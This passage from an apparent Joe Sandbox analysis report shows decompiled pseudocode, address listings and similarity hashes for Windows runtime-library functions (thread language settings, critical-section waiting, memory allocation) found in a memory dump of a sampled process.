																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E016DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E016DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E016DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E016DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E016DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1797b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1797b84 = _t75;
						_t73 = E016BEB70(_t134, 0x1797b60);
						if( *0x1797b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E016BFF60( *0x1797b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                        0x016dfab0
                                        0x016dfab2
                                        0x016dfab3
                                        0x016dfab4
                                        0x016dfabc
                                        0x016dfac0
                                        0x016dfb14
                                        0x016dfb17
                                        0x016dfac2
                                        0x016dfac8
                                        0x016dfacd
                                        0x016dfad3
                                        0x016dfad3
                                        0x016dfadd
                                        0x016dfb18
                                        0x016dfb1b
                                        0x016dfb1d
                                        0x016dfb1e
                                        0x016dfb1f
                                        0x016dfb20
                                        0x016dfb21
                                        0x016dfb22
                                        0x016dfb23
                                        0x016dfb24
                                        0x016dfb25
                                        0x016dfb26
                                        0x016dfb27
                                        0x016dfb28
                                        0x016dfb29
                                        0x016dfb2a
                                        0x016dfb2b
                                        0x016dfb2c
                                        0x016dfb2d
                                        0x016dfb2e
                                        0x016dfb2f
                                        0x016dfb3a
                                        0x016dfb3b
                                        0x016dfb3e
                                        0x016dfb41
                                        0x016dfb44
                                        0x016dfb47
                                        0x016dfb4a
                                        0x016dfb4d
                                        0x016dfb53
                                        0x0171bdcb
                                        0x0171bdcb
                                        0x016dfb59
                                        0x016dfb5b
                                        0x016dfb5b
                                        0x016dfb5e
                                        0x0171bdd5
                                        0x0171bdd8
                                        0x00000000
                                        0x0171bdda
                                        0x00000000
                                        0x0171bdda
                                        0x016dfb64
                                        0x016dfb64
                                        0x016dfb64
                                        0x016dfb67
                                        0x016dfb6e
                                        0x016dfb70
                                        0x016dfb72
                                        0x00000000
                                        0x016dfb78
                                        0x016dfb7a
                                        0x016dfb7a
                                        0x016dfb7d
                                        0x016dfb80
                                        0x0171bddf
                                        0x0171bde1
                                        0x00000000
                                        0x0171bde3
                                        0x00000000
                                        0x0171bde3
                                        0x016dfb86
                                        0x016dfb86
                                        0x016dfb86
                                        0x016dfb8b
                                        0x016dfb90
                                        0x016dfb92
                                        0x016dfb94
                                        0x016dfb9a
                                        0x016dfb9b
                                        0x016dfba1
                                        0x0171bde8
                                        0x0171bdeb
                                        0x0171bded
                                        0x0171beb5
                                        0x0171beb5
                                        0x0171bebb
                                        0x0171bebd
                                        0x0171bec3
                                        0x0171bed2
                                        0x0171bedd
                                        0x0171bedd
                                        0x0171beed
                                        0x00000000
                                        0x0171bdf3
                                        0x0171bdfe
                                        0x0171be06
                                        0x0171be0b
                                        0x0171be0d
                                        0x0171be0f
                                        0x0171be14
                                        0x0171be19
                                        0x0171be20
                                        0x0171be25
                                        0x0171be27
                                        0x0171be35
                                        0x0171be39
                                        0x0171be46
                                        0x0171be4f
                                        0x0171be54
                                        0x0171be56
                                        0x0171bef8
                                        0x0171bef8
                                        0x00000000
                                        0x0171be5c
                                        0x0171be5c
                                        0x0171be60
                                        0x00000000
                                        0x0171be66
                                        0x0171be66
                                        0x0171be7f
                                        0x0171be84
                                        0x0171be87
                                        0x0171be89
                                        0x0171be8b
                                        0x0171be99
                                        0x0171be9d
                                        0x0171bea0
                                        0x0171beac
                                        0x0171beaf
                                        0x0171beb1
                                        0x0171beb3
                                        0x0171beb3
                                        0x00000000
                                        0x0171bea2
                                        0x0171bea2
                                        0x00000000
                                        0x0171bea2
                                        0x0171be8d
                                        0x0171be8d
                                        0x0171be92
                                        0x00000000
                                        0x0171be92
                                        0x0171be8b
                                        0x0171be60
                                        0x0171be3b
                                        0x0171be3b
                                        0x0171be3e
                                        0x00000000
                                        0x0171be40
                                        0x0171be40
                                        0x0171be44
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0171be44
                                        0x0171be3e
                                        0x0171be29
                                        0x0171be29
                                        0x00000000
                                        0x0171be29
                                        0x0171be27
                                        0x00000000
                                        0x016dfba7
                                        0x016dfba7
                                        0x016dfbab
                                        0x0171bf02
                                        0x016dfbb1
                                        0x016dfbb1
                                        0x016dfbb8
                                        0x016dfbbd
                                        0x016dfbbd
                                        0x016dfbbf
                                        0x016dfbbf
                                        0x016dfbc5
                                        0x016dfbcb
                                        0x016dfbf8
                                        0x016dfbf8
                                        0x016dfbfa
                                        0x00000000
                                        0x016dfc00
                                        0x016dfc00
                                        0x016dfc03
                                        0x00000000
                                        0x016dfc09
                                        0x016dfc09
                                        0x016dfc0f
                                        0x016dfc15
                                        0x016dfc23
                                        0x016dfc23
                                        0x016dfc25
                                        0x016dfc27
                                        0x016dfc75
                                        0x016dfc7c
                                        0x016dfc84
                                        0x00000000
                                        0x016dfc29
                                        0x016dfc29
                                        0x016dfc2d
                                        0x016dfc30
                                        0x0171bf0f
                                        0x00000000
                                        0x016dfc36
                                        0x016dfc38
                                        0x016dfc3b
                                        0x016dfc41
                                        0x0171bf17
                                        0x0171bf19
                                        0x0171bf48
                                        0x0171bf4b
                                        0x00000000
                                        0x0171bf1b
                                        0x0171bf22
                                        0x0171bf24
                                        0x0171bf26
                                        0x00000000
                                        0x0171bf2c
                                        0x0171bf37
                                        0x0171bf39
                                        0x0171bf3b
                                        0x00000000
                                        0x0171bf41
                                        0x0171bf41
                                        0x0171bf41
                                        0x0171bf41
                                        0x0171bf45
                                        0x00000000
                                        0x0171bf45
                                        0x0171bf3b
                                        0x0171bf26
                                        0x00000000
                                        0x016dfc47
                                        0x016dfc47
                                        0x016dfc49
                                        0x016dfcb2
                                        0x016dfcb4
                                        0x016dfcb6
                                        0x016dfcdc
                                        0x016dfcdc
                                        0x00000000
                                        0x016dfcb8
                                        0x016dfcc3
                                        0x016dfcc5
                                        0x016dfcc7
                                        0x00000000
                                        0x016dfcc9
                                        0x016dfcc9
                                        0x016dfccd
                                        0x00000000
                                        0x016dfccd
                                        0x016dfcc7
                                        0x00000000
                                        0x016dfc4b
                                        0x016dfc4b
                                        0x016dfc4e
                                        0x016dfc4e
                                        0x016dfc51
                                        0x016dfc51
                                        0x016dfc54
                                        0x016dfc5a
                                        0x016dfc5c
                                        0x016dfc5f
                                        0x016dfc61
                                        0x016dfc63
                                        0x016dfc65
                                        0x016dfc67
                                        0x016dfc6e
                                        0x016dfc72
                                        0x016dfc72
                                        0x016dfc72
                                        0x016dfc72
                                        0x016dfc67
                                        0x016dfc61
                                        0x00000000
                                        0x016dfc5a
                                        0x016dfc49
                                        0x016dfc41
                                        0x016dfc30
                                        0x016dfc27
                                        0x016dfc03
                                        0x016dfbcd
                                        0x016dfbd3
                                        0x016dfbd9
                                        0x016dfbdc
                                        0x016dfbde
                                        0x016dfc99
                                        0x016dfc9b
                                        0x016dfc9d
                                        0x016dfcd5
                                        0x016dfcd5
                                        0x016dfc89
                                        0x016dfc89
                                        0x00000000
                                        0x016dfc9f
                                        0x016dfc9f
                                        0x016dfca3
                                        0x00000000
                                        0x016dfca3
                                        0x00000000
                                        0x016dfbe4
                                        0x016dfbe4
                                        0x016dfbe4
                                        0x016dfbe4
                                        0x016dfbe9
                                        0x016dfbf2
                                        0x00000000
                                        0x016dfbf2
                                        0x016dfbde
                                        0x016dfbcb
                                        0x016dfbab
                                        0x016dfc8b
                                        0x016dfc8b
                                        0x016dfc8c
                                        0x016dfb80
                                        0x016dfb72
                                        0x016dfb5e
                                        0x016dfc8d
                                        0x016dfc91
                                        0x016dfadf
                                        0x016dfadf
                                        0x016dfae1
                                        0x016dfae4
                                        0x016dfae7
                                        0x016dfaec
                                        0x016dfaf8
                                        0x016dfb00
                                        0x016dfb07
                                        0x016dfb0f
                                        0x016dfb0f
                                        0x016dfb07
                                        0x00000000
                                        0x016dfaf8
                                        0x016dfadd

                                        Strings
                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0171BE0F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                        • API String ID: 0-865735534
                                        • Opcode ID: b9cea9c72bbf677bfcf1e1288b0c1ead9aa8db2fb0ee5e9c346b31ad547e4578
                                        • Instruction ID: 683ba233ebc0a42b9c66e12b318441b7da1047f2dcb6902aa468c6c27cb3573f
                                        • Opcode Fuzzy Hash: b9cea9c72bbf677bfcf1e1288b0c1ead9aa8db2fb0ee5e9c346b31ad547e4578
                                        • Instruction Fuzzy Hash: D5A1D071E006068BEB25DB6CCC50BAAB7B5AF48720F0445ADE947DB785DB30D9478B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E016A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1795350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1797bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016E97C0();
				}
				if( *0x17979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x17979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E016D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E016C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0173FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E016E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E016DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L016FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1796901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1796901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E016E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E016C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E016C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01727016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0173FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1795350;
							if(_t109 != 0x1795350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0173FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01735720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                        0x016a2d8a
                                        0x016a2d8a
                                        0x016a2d92
                                        0x016a2d96
                                        0x016a2d9e
                                        0x016a2da0
                                        0x016a2da3
                                        0x016a2da5
                                        0x016a2da8
                                        0x016a2dab
                                        0x016a2db2
                                        0x016ff9aa
                                        0x016ff9ab
                                        0x016ff9ae
                                        0x016ff9ae
                                        0x016a2db8
                                        0x016a2dc2
                                        0x016ff9b9
                                        0x016ff9be
                                        0x016ff9bf
                                        0x016ff9bf
                                        0x016a2dcf
                                        0x016ff9c9
                                        0x016a2dd5
                                        0x016a2dd5
                                        0x016a2dd5
                                        0x016a2dde
                                        0x016a2de1
                                        0x016a2e70
                                        0x016a2e72
                                        0x016a2e72
                                        0x016a2de7
                                        0x016a2deb
                                        0x016a2e7c
                                        0x016a2e83
                                        0x016a2e85
                                        0x016a2e8b
                                        0x016a2e8d
                                        0x016a2e92
                                        0x016a2e92
                                        0x016a2e85
                                        0x016a2df1
                                        0x016a2df7
                                        0x016a2df9
                                        0x016a2df9
                                        0x016a2dfc
                                        0x016a2dff
                                        0x016a2e02
                                        0x00000000
                                        0x016a2e05
                                        0x016a2e0c
                                        0x016ff9d9
                                        0x016a2e12
                                        0x016a2e12
                                        0x016a2e12
                                        0x016a2e1a
                                        0x016ff9e3
                                        0x016ff9e9
                                        0x016ff9f0
                                        0x016ff9f6
                                        0x016ff9f8
                                        0x016ff9f8
                                        0x016ff9f0
                                        0x016a2e23
                                        0x016ffa02
                                        0x016ffa03
                                        0x016ffa05
                                        0x016ffa06
                                        0x00000000
                                        0x016a2e29
                                        0x016a2e29
                                        0x016a2e2e
                                        0x016a2e34
                                        0x016a2e3e
                                        0x00000000
                                        0x00000000
                                        0x016a2e44
                                        0x016a2e47
                                        0x016a2e4d
                                        0x00000000
                                        0x00000000
                                        0x016a2e4f
                                        0x016a2e54
                                        0x00000000
                                        0x00000000
                                        0x016a2e5a
                                        0x016a2e5f
                                        0x016a2e9a
                                        0x016a2ea4
                                        0x016a2ea5
                                        0x016a2ea8
                                        0x016a2eaf
                                        0x016a2eb2
                                        0x016a2eb5
                                        0x016ffae9
                                        0x016ffaeb
                                        0x016ffaed
                                        0x016ffaef
                                        0x016ffaf7
                                        0x016ffaf8
                                        0x016ffafd
                                        0x016ffaff
                                        0x016ffb04
                                        0x016ffb04
                                        0x016ffaff
                                        0x016a2ec0
                                        0x016a2ec4
                                        0x016a2ec6
                                        0x016a2ec8
                                        0x016ffb14
                                        0x016ffb18
                                        0x016ffb1e
                                        0x016ffb21
                                        0x016ffb21
                                        0x016a2ece
                                        0x016a2ece
                                        0x016a2ece
                                        0x016a2ed7
                                        0x016a2e61
                                        0x016a2e63
                                        0x016ffa6b
                                        0x016ffa71
                                        0x016ffa76
                                        0x016ffa78
                                        0x016ffa8a
                                        0x016ffa7a
                                        0x016ffa83
                                        0x016ffa83
                                        0x016ffa8f
                                        0x016ffa91
                                        0x016ffa97
                                        0x016ffa9d
                                        0x016ffaa4
                                        0x016ffaaa
                                        0x016ffaaf
                                        0x016ffab1
                                        0x016ffac3
                                        0x016ffab3
                                        0x016ffabc
                                        0x016ffabc
                                        0x016ffac8
                                        0x016ffacb
                                        0x016ffadf
                                        0x016ffadf
                                        0x016ffacb
                                        0x016ffaa4
                                        0x016ffa91
                                        0x016a2e6f
                                        0x016a2e6f
                                        0x016a2e5f
                                        0x016ffa13
                                        0x016ffa15
                                        0x016ffa17
                                        0x016ffa1f
                                        0x016ffa21
                                        0x016ffa22
                                        0x016ffa25
                                        0x016ffa28
                                        0x016ffa2f
                                        0x016ffa2f
                                        0x016ffa2a
                                        0x016ffa2a
                                        0x016ffa2a
                                        0x016ffa31
                                        0x016ffa34
                                        0x016ffa36
                                        0x016ffa3c
                                        0x016ffa3e
                                        0x016ffa41
                                        0x016ffa43
                                        0x016ffa45
                                        0x016ffa45
                                        0x016ffa41
                                        0x016ffa3c
                                        0x016ffa4a
                                        0x016ffa4f
                                        0x016ffa51
                                        0x016ffa53
                                        0x016ffa56
                                        0x016ffa5b
                                        0x016ffa5e
                                        0x00000000
                                        0x016ffa5e
                                        0x016a2e23

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Re-Waiting
                                        • API String ID: 0-316354757
                                        • Opcode ID: 50b10c6bc971f454fb9b9a1b5c3fa065db302747bb59d30f4d2c9ed337d78bce
                                        • Instruction ID: 47684e84976653570ff9ae6808ee670316ac148cd8220d08e64c31b63cfcb341
                                        • Opcode Fuzzy Hash: 50b10c6bc971f454fb9b9a1b5c3fa065db302747bb59d30f4d2c9ed337d78bce
                                        • Instruction Fuzzy Hash: 8B611272A40645EBDB22DB6CCC94B7EBBA1FB44724F1402ADEA11973C2C7349D468B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01770EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E01770EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0176FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01771074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E016E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0176A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0176A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1798b04 >> 0x14) + (_v44 -  *0x1798b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E016C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0176138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E016C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0175FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1798724 & 0x00000008) != 0) {
						E017652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E017715B5(0x1798ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                        0x01770eb7
                                        0x01770eb9
                                        0x01770ec0
                                        0x01770ec2
                                        0x01770ecd
                                        0x0177105b
                                        0x0177105b
                                        0x01771061
                                        0x01771066
                                        0x01771066
                                        0x0177106b
                                        0x01771073
                                        0x01771073
                                        0x01770ed3
                                        0x01770ed6
                                        0x01770edc
                                        0x01770ee0
                                        0x01770ee7
                                        0x01770ef0
                                        0x01770ef5
                                        0x01770efa
                                        0x01770efc
                                        0x01770efd
                                        0x01770f03
                                        0x01770f04
                                        0x01770f06
                                        0x01770f07
                                        0x01770f09
                                        0x01770f0e
                                        0x01770f14
                                        0x01770f23
                                        0x01770f2d
                                        0x01770f34
                                        0x01770f34
                                        0x01770f14
                                        0x01770f52
                                        0x00000000
                                        0x00000000
                                        0x01770f58
                                        0x01770f73
                                        0x01770f74
                                        0x01770f79
                                        0x01770f7d
                                        0x01770f80
                                        0x01770f86
                                        0x01770fab
                                        0x01770fb5
                                        0x01770fc6
                                        0x01770fd1
                                        0x01770fe3
                                        0x01770fd3
                                        0x01770fdc
                                        0x01770fdc
                                        0x01770feb
                                        0x01771009
                                        0x01771009
                                        0x01771015
                                        0x01771027
                                        0x01771017
                                        0x01771020
                                        0x01771020
                                        0x0177102f
                                        0x0177103c
                                        0x0177103c
                                        0x01771048
                                        0x01771050
                                        0x01771050
                                        0x01771055
                                        0x00000000
                                        0x01771055
                                        0x01770f88
                                        0x01770f9e
                                        0x01770fa2
                                        0x01770fa9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01770fa9
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 545d17ec114acfb12ab103eba9a376aa92916cd3b442a0baa66212d41ea74a73
                                        • Instruction ID: 1b77b2c1cbeb3c57bc3dbf9a54a050b5b824807fd35e6ca21d69a60975b7b993
                                        • Opcode Fuzzy Hash: 545d17ec114acfb12ab103eba9a376aa92916cd3b442a0baa66212d41ea74a73
                                        • Instruction Fuzzy Hash: 79519C713043429FEB25DF28D884B2BFBE9EBC5714F04092CFA9697291D670E905CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E016DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E016C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E016E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E016E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016E95D0();
							goto L11;
						} else {
							_t109 = L016C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
